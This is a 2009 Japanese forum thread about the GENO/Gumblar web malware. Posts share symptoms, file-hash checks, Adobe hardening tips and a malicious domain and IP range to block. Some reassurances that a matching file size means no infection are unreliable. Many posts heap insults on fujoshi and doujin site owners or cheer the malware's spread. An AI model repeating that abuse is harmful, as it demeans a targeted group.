GENOウイルススレ ★8

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

前スレ
GENOウイルススレ ★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/
2名無しさん@お腹いっぱい。:2009/05/16(土) 21:18:12
KINGは業界団体に入ってない単なるジョークソフト
http://internet.watch.impress.co.jp/cda/news/2008/02/05/18360.html

ALWIL Software
AV-Comparatives
AV-Test.org
AVG Technologies
Avira GmbH
Bit9
BitDefender
Doctor Web, Ltd.
ESET
F-Secure Corporation
G DATA Software
Hispasec Sistemas
International Business Machines Corporation
Kaspersky Lab
McAfee, Inc.
Microsoft Corp.
Norman ASA
Panda Security
PC Tools
Sana Security
Secure Computing
Sophos Plc
Symantec Corporation
Trend Micro Incorporated
Virusbuster Ltd.
3名無しさん@お腹いっぱい。:2009/05/16(土) 21:18:44
また腐女子か。
キモイから規制しろ
4名無しさん@お腹いっぱい。:2009/05/16(土) 21:19:03
関連スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
5名無しさん@お腹いっぱい。:2009/05/16(土) 21:19:23
409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。

6名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:07
★過去スレ
GENOウイルススレ ★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/
GENOウイルススレ ★5(★6)
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415022/
GENOウイルススレ ★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
7名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:14
409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。
8名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:18
結局次スレたったんだな
9名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:25
>>1

前スレ>>997
その両者だったらばかなやつの方がマシだろ
10名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:41
腐女子は巣に帰ってください。セキュ板からのお願いです
11名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:42
>>1
同人サイトの方はまずこちらを見て下さい
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

同人スレの方のまとめより、まとめ見ても全然分からないって人は
とりあえずこれだけはやっとけ、自分でサイト持ってない人はとりあえずは何もしなくてよし
>最低限やるべきこと
>あなたがサイト管理者である場合、自サイトのソースをチェックし
></head>と<body>の間に入れた覚えのないjavascriptのコードが入ってるか確認してください。
>入っている場合はウィルスに感染しています。
>感染を広げないため、一刻も早くサイトを削除してください。
12名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:48
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
13名無しさん@お腹いっぱい。:2009/05/16(土) 21:20:59
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
14名無しさん@お腹いっぱい。:2009/05/16(土) 21:21:00
雑談スレなんてイラネ
15名無しさん@お腹いっぱい。:2009/05/16(土) 21:21:42
腐女子って本当ネチネチしてんだな
マジクズ
16名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:15
>>1
17名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:26
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
18名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:32
>>9
しつもんする→わかんない
無限ループ
19名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:43
前スレが腐スレヲチで終わってるんだが
20名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:50
お前らほんとに腐女子好きなんだなw
21名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:53
   ⊂二 ̄⌒\ シェシェ〜
          )\   ヽ         ニーーハォ!!
         /__   )   ∧∧        ノ)
        ////  /|.  / 華 \       / \   ワタシ嘘大っ嫌いアルヨ!! 
        / / / //\ \( `ハ´ )   _/ /^\)
       / / / (/   ヽ、        ⌒ ̄_/
      ( ( (/      ノ  T M / ̄     みなさん今日は大変うれしいおしらせアルヨ〜!!
                ./     /          このチャンス逃したら一生後悔するアルネ!!
                    |\                 
              / ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
              | なんと!あの!国民的大人気サクサク快適安心ソフト、ウイルスバスターが
              | 只今、無料で2カ月延長利用できるキャンペーンアルヨ〜!!!
              \________________________________
22名無しさん@お腹いっぱい。:2009/05/16(土) 21:22:53
とりあえずGENOの思惑は腐女子によってかなえられそうだな

次スレイランのでは?
23名無しさん@お腹いっぱい。:2009/05/16(土) 21:23:12
ドメインとIP変わったっぽいから弾いてる奴は注意な
martuz.cn
95.129.144.0/23 (95.129.144.0-95.129.145.255)
24名無しさん@お腹いっぱい。:2009/05/16(土) 21:23:41
GENO亜種が猛威振るってるな
いいぞもっとやれ
25名無しさん@お腹いっぱい。:2009/05/16(土) 21:23:46
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
26名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:00
>>20
セキュ板はツンデレが多いですから
27名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:09
前スレがスレッドランキングに載ったぞw
セキュ板だとAVGの日本語化以来かな
28名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:27
ゴキ腐リは嫌だ
可愛いおにゃのこがいいお
29名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:34
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
30名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:36
情報が欲しい奴は同人板に行ったほうが良い
機能してるのはあっちのスレだ
31名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:37
こんなレベルの奴らに何言っても無駄だろ
ゆとり並に理解力ない上に無駄に高いプライドとかもう勝手に死んでくれと言うほかない

1 名前:自治 ◆mXx5gfarvs [] 投稿日:2009/05/09(土) 22:58:13 ID:apD2m+Ke0
同人板の自治スレです。

前スレ
【議論中】自治スレ 21@同人板
http://changi.2ch.net/test/read.cgi/doujin/1237720615/

【緊急!現在ウィルス爆撃被害中。怪しいファイルをダウンロードしない等の自衛に努めて下さい】

★ウイルス関係まとめサイト★
http://life.45.kg/sec/for_doujin.html
http://www9.atwiki.jp/doujin-m/
http://life.45.kg/sec/

【現状】
▲現在同人板を爆撃しているウィルス
・スレッド内のレスをランダムコピペ。直前の書き込みにレスをつけたり、
トリップをつけたりするものもあります。
・970を過ぎたスレを埋め立てるウイルスもいます
・ウイルスとの区別のために名前欄に「自治#自治」入力推奨

【感染すると?】
・ウイルス混入のファイル実行で感染 (スレ見ただけでは感染しないからおちけつ)
・ウィルス感染者は、同人板閲覧者や2ch閲覧者とは限りません
・専ブラによるあぼーん機能の使用推奨

・感染すると自分の知らない間に、爆撃対象のスレに連続コピペ投下
・爆撃を果たしたIDは管理側にIPを割り出され、BBQに焼かれて書き込めなくなります
※現在は共有IPでも焼かれているので、巻き込まれる・巻き込む可能性もあります
32名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:45
                 _.. -――- ._
              ./  ,―――‐- ._` .
             /)  ./  /  /  ``\
           ///)ィ7T.フ厂 ̄`フi ‐-_ |〉. _人人人人人人人人人人人人人人_
          /,.=゙''"/  フl/_×// |ハハl .ト、> キャッシュ削除すればいいんだよ!!<
   /     i f ,.r='"-‐'つイ._T_i`   .r≦lハ!|`` ^^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
  /      /   _,.-‐'~| |'弋..!ノ     i'+!l |
    /   ,i   ,二ニ⊃l |' ' '  ,‐- ..__゙ー' .!l .|
   /    ノ    i l゙フ..,!l .ト、  l  `,!   .ハ.!
      ,イ「ト、  ,! ,!|.../_| |l: > .ヽ.. ィ <l   l|
     / iトヾヽ_/ ィ"\. | | \ \ー'/ ./ ,,;:`:;'゙
33名無しさん@お腹いっぱい。:2009/05/16(土) 21:24:54
>>27
マジ? 久しぶりだな
34名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:04
確かに同人板の方がウイルスの話してるなw
35名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:10
>>31
同意
もうなんか色々呆れた
36名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:38
       ___
     /      \
    /   ⌒   ⌒\
  /     ,(⌒) (⌒)、\
  |     /// (__人__)/// |   日本製だってお
  \      ` ヽ_ノ   /
    ヽ    , __ , イ
    /       |_"____
   |   l..   /l´産地偽装 `l
   ヽ  丶-.,/  |________._|
   /`ー、_ノ /バスター /
            ...2009/
37名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:42
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3


PC初心者なんでCRC32.MD5.SHA-1ってのがよく分からんのだが
サイズは丁度同じだった。


感染してないとみて大丈夫そうでしょうか?
お願いします。
38名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:45
>>27
起動酎スキャンのAVGか
39名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:46
男ツンデレなんていらねーよw
おまえら単に女の子との接し方しらないだけろ。
好きな子にイジワルする小学生から成長してないセキュ住民ワロス
40名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:47
>>23
おk
41名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:52
腐女子が勝手に押しかけてきて荒らしていったスレ
おまけに粘着腐女子は未だ健在
42名無しさん@お腹いっぱい。:2009/05/16(土) 21:25:58
踏んでしまったらしくIEがネットに繋がらなくなった
今はサブ機で2chしてる、cmdとかregeditは使える。

Windows XP用ネットワーク診断ツールの結果

前回の診断実行時刻: 05/16/09 21:23:13 ネットワーク アダプタの診断
ネットワークの場所の検出

info ホーム インターネット接続を使用します
ネットワーク アダプタの識別

error エラー 0x80070424: 指定されたサービスはインストールされたサービスとして存在しません。

HTTP、HTTPS、FTP の診断
HTTP、HTTPS、FTP の接続

warn HTTP: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (パッシブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (アクティブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn HTTP: エラー 12007 (www.hotmail.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.passport.net に接続中): The server name or address could not be resolved
error HTTP 接続ができませんでした。
error HTTPS 接続ができませんでした。
error FTP 接続ができませんでした。
43名無しさん@お腹いっぱい。:2009/05/16(土) 21:26:01
-----------同人関係の方は以下スレにてお願いします-------------

【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/
44名無しさん@お腹いっぱい。:2009/05/16(土) 21:26:53
このまま一般サイトに感染すれば面白いんだけどな
45名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:23
>>43
今はこっちが勝手に観察して
ネタを張り付けてるやつがいるだけだろ
46名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:25
腐女子腐女子言うやつらは向こう行って構ってもらえよ
47名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:26
>>44
してますけど
48名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:46
>>47
メシウマ!
49名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:47
凄い進んでるが何か恐ろしい事でも起きたのか?
50名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:49
法人サイトが感染しまくりでカオスな状況を楽しみたかったのに
この騒ぎだと月曜までに認知度上がっちゃって、web管理者が対策しちゃいそうだな
51名無しさん@お腹いっぱい。:2009/05/16(土) 21:27:53
>>37
とりあえずファイルサイズが一緒なら大丈夫だと思う
52名無しさん@お腹いっぱい。:2009/05/16(土) 21:28:24
>>49
トレンドマイクロいよいよピンチ
53名無しさん@お腹いっぱい。:2009/05/16(土) 21:28:30
別にホモサイトが絶滅しても一向にかまわんよ
54名無しさん@お腹いっぱい。:2009/05/16(土) 21:28:51
むしろ壊滅すればいいと思うよ
55名無しさん@お腹いっぱい。:2009/05/16(土) 21:29:04
30代40代のババアが「女の子」www
56名無しさん@お腹いっぱい。:2009/05/16(土) 21:29:20
>>40
間違ってるかもしらんから自分でチェックよろ
http://www3.atword.jp/gnome/
57名無しさん@お腹いっぱい。:2009/05/16(土) 21:29:34
腐女子はキモイだけじゃなく存在自体が邪魔だからな
58名無しさん@お腹いっぱい。:2009/05/16(土) 21:29:43
ノートン先生と一緒に寝るお
59名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:04
実際法人サイトはどの程度影響されてるんだ?
60名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:11
あぼんばっかり
61名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:21
バスターまた更新キタ
4GB
62名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:22
とりあえずAdobe Readerを削除すればいいんだな
ずっと使ってないしうp立てもしてないし消してもいいや
63名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:24
あらゆる板から嫌悪されているのが腐女子
今ようやく理由が分かった気がする
64名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:25
つーか普通は一般サイトにウイルス蔓延してもちゃんと対策するだろ
情弱ゆとり腐のサイトがことごとく壊滅するだけ
65名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:26
おい同人サイト怖くていけなくなったじゃねえか
オタク引退宣言だわ
66名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:41
>>49
ノートン先生が働いてくれない
67名無しさん@お腹いっぱい。:2009/05/16(土) 21:30:45
>>37
MD5いっしょだから大丈夫だろ
68名無しさん@お腹いっぱい。:2009/05/16(土) 21:31:28
あんだけ荒らしておいて謝罪なしとか腐女子マジキチ
69名無しさん@お腹いっぱい。:2009/05/16(土) 21:32:11
あれ…朝見たとき5だったと思ったら
なんかあったの?
70名無しさん@お腹いっぱい。:2009/05/16(土) 21:32:17
むしろ暴れてたのはν速民な気が
71名無しさん@お腹いっぱい。:2009/05/16(土) 21:32:19
>>49
マカフィー2010発売延期
72名無しさん@お腹いっぱい。:2009/05/16(土) 21:32:49
来なくて良い
73名無しさん@お腹いっぱい。:2009/05/16(土) 21:32:58
>>68
ほとんどここの住民が勝手に騒いでただけじゃね
74名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:00
>>70
最初は腐板から勝手にリンクされて大量搬入された
75名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:12
>>69
腐と戯れるひととき
76名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:16
>>62
FlashPlayerも削除してくれ
77名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:16
>>66
いつも通りだけどな。
そういう意味では遅くても来週には落ち着く。
マイクロソフトのパッチも出るかもな。
78名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:19
>>49
ノートン先生が食中毒で運ばれた
79名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:42
読者のみなさんにねらーだってバレるの嫌なので
ウイルス注意喚起文はサイトに載せません^^
80名無しさん@お腹いっぱい。:2009/05/16(土) 21:33:49
人の多いwiki系のとこはヤバイんじゃね?
リンクを感染サイトへの外部リンクに書き換えられまくったらアウト
81名無しさん@お腹いっぱい。:2009/05/16(土) 21:34:08
>>73
いいからお前は巣に帰れよ
迷惑なんだ、マジで。
82名無しさん@お腹いっぱい。:2009/05/16(土) 21:34:10
ノートン先生が15歳の美少女で処女だと判明した>49
83名無しさん@お腹いっぱい。:2009/05/16(土) 21:34:22
ねらーって事より腐女子って事の方がよほど恥ずかしいと思う
84名無しさん@お腹いっぱい。:2009/05/16(土) 21:34:39
同人サイト以外にも同盟サイトなどにも感染してるみたいです
ただ同人板にスレ立ってるおかげで同人サイトが目立っているようす
85名無しさん@お腹いっぱい。:2009/05/16(土) 21:34:46
>>78
先生に比べると対策済みのVBは優秀だね
86名無しさん@お腹いっぱい。:2009/05/16(土) 21:35:19
ウイルスにねらーも何もないんだけど
さすがマジキチはレベルが違うな
87名無しさん@お腹いっぱい。:2009/05/16(土) 21:35:32
vistaが最強であることが証明されたの?
88名無しさん@お腹いっぱい。:2009/05/16(土) 21:35:33
>>83
確かにホモでハアハアしてるよりは
ネラーの方がまだマシだな
89名無しさん@お腹いっぱい。:2009/05/16(土) 21:35:51
>>85
台湾人特有の釣りですか?
90名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:07
>>69
ホモ同人が見れなくなって発狂した腐女子が大量に釣れた
91名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:13
腐女子ってなんでくだらないプライド持ってるの?ゴキブリなの?
92名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:14
ウイルス対策ベンダーにとっても今回の件は頭が痛いんじゃないか
有料のノートンより個人使用に限り無償のavastが活躍してさ。
「なんだ無料のウイルス対策ソフトの方が優秀じゃね」という事に気が付いて。
93名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:18
>>87
operaもな
94名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:31
ああいう一部のキチ層がいるせいで同人の奴らが変な目で見られるんじゃないの
ちゃんと正してやれよ仲間だろ
95名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:47
そもそも、すでに同人サイトだけの問題ってわけでもないからなあ
MSも動いてくれなきゃ糞面倒な状況はかわらないし

>>87
亜種が沢山あるから安心できないぜ
96名無しさん@お腹いっぱい。:2009/05/16(土) 21:36:51
>>73
気持ち悪いな巣に帰れよゴミが
97名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:02
>>94
関わりたくないしお断りします
98名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:10
Adblockで*.cnと*.krのコンテンツをブロックしてたから全く気づかなかったわ
99名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:11
AVG><
100名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:13
久しぶりにウイルスでギャーぎゃー言ってるから
山田ウイルスみたいなすっげーのかと思ったら腐女子がグェグェ大げさに騒いでただけだったのねん
101名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:21
>>92
目立たないだけで結構あるし、もちろん逆も多い。
流石に今回のはでかいけど。
102名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:26
vistaを売りたいゲイツの罠なのか
103名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:31
>>93
狐は
104名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:43
>>92
4月下旬にもう感染サイト弾いてくれてたからねavastは
105名無しさん@お腹いっぱい。:2009/05/16(土) 21:37:54
IPの遮断ってどないすんねん
106名無しさん@お腹いっぱい。:2009/05/16(土) 21:38:01
同人と腐女子に過剰反応しすぎだろw
107名無しさん@お腹いっぱい。:2009/05/16(土) 21:38:23
荒れた原因ですから<腐女子
108名無しさん@お腹いっぱい。:2009/05/16(土) 21:38:52
マジキチの話はもういいから
109名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:01
なんで、このスレ異常に速いの?
110名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:04
小林製薬でも感染してお詫びしてるくらいなのに…
111名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:08
この件、もの凄い事実に気づいてしまった・・・・
まさかとは思ったけど、なんかアレだな
112名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:27
>>106
もういいから来るなよ
ホモでハアハアしてな
ここを荒らすな
113名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:35
親父がよくニフあたりのFlashゲーやってるから不安だなぁ
114名無しさん@お腹いっぱい。:2009/05/16(土) 21:39:48
GENOもまさか殺害予告出されるとは思わなかったろうな
115名無しさん@お腹いっぱい。:2009/05/16(土) 21:40:01
カスペおじさんキレるよ?
116名無しさん@お腹いっぱい。:2009/05/16(土) 21:40:42
まさか同人同人騒いで無かったことにしようとしてるんじゃ
ないよね
GENOさん
117名無しさん@お腹いっぱい。:2009/05/16(土) 21:41:37
腐サイト全滅すれば良いのにな
118名無しさん@お腹いっぱい。:2009/05/16(土) 21:41:38
GENO「や ら な い か?」
119名無しさん@お腹いっぱい。:2009/05/16(土) 21:41:43
IPのブロックってどないすんねん
120名無しさん@お腹いっぱい。:2009/05/16(土) 21:42:07
またいらんところで敵を作った腐女子であった
121名無しさん@お腹いっぱい。:2009/05/16(土) 21:42:16
GENOウイルスなんてVB入れてれば全然怖くないよ
122名無しさん@お腹いっぱい。:2009/05/16(土) 21:42:18
お前ら言いすぎwwwwwwwwww
とも思ったが向こう見てると確かにひどいwwww
バカ多すぐるwwwwwwwww
だから大流行してんだろうな、同人サイトでwwwwwwwwww
123名無しさん@お腹いっぱい。:2009/05/16(土) 21:42:33
俺がGENOだあああああああ!!!!!
124名無しさん@お腹いっぱい。:2009/05/16(土) 21:42:43
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
125名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:06
>>122
同人サイトがウイルスばらまいてるんだよな
あいつらがいなくなれば無くなりそうww
126名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:22
たった1日スレ見なかった間になんでこんなに伸びてるの?
127名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:31
Meの場合はどうやって感染確認するのでしょうか
128名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:35
>>125
とっととサイト消せばいい話なんだけどな
129名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:38
亜種っていっても基本的な感染経路や動作が同じなら対策は変わらないんで、
スレが脱線するのもやむをえない。
130名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:51
>>119
lt;丶`∀´gt; PeerGuardian2 ★ 4 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1228949365/
131名無しさん@お腹いっぱい。:2009/05/16(土) 21:43:55
>>118
adobeの穴を閉めとかないとな
132名無しさん@お腹いっぱい。:2009/05/16(土) 21:44:01
>>126
腐女子に荒らされた
133名無しさん@お腹いっぱい。:2009/05/16(土) 21:44:10

セキュリティスレに見せ掛けたオタ叩きスレ?
134名無しさん@お腹いっぱい。:2009/05/16(土) 21:44:33
>>129
だよな。
135名無しさん@お腹いっぱい。:2009/05/16(土) 21:44:37
>>126
トレンドマイクロいよいよピンチ
136名無しさん@お腹いっぱい。:2009/05/16(土) 21:44:44
>>133
腐女子が散々荒らした残骸がこのスレです
137名無しさん@お腹いっぱい。:2009/05/16(土) 21:45:42
>>133
違うよ
あいつらが今回のウイルスの原因だから
138名無しさん@お腹いっぱい。:2009/05/16(土) 21:45:46
ゾイド板から
139名無しさん@お腹いっぱい。:2009/05/16(土) 21:45:48
>>133
腐女子たたきスレですw
実質同人板の方が機能してる
140名無しさん@お腹いっぱい。:2009/05/16(土) 21:45:53
このスレで今一番HOTな対策ソフトって何?
141名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:21
>>140
ノートン先生です
142名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:35
>>140
CAかな
143名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:37
>>140
ウイルスバスター
144名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:50
>>136
軌道修正しねえの?
145名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:52
>>109
IDが出ないから頭のアレな子達が大はしゃぎ
146名無しさん@お腹いっぱい。:2009/05/16(土) 21:46:54
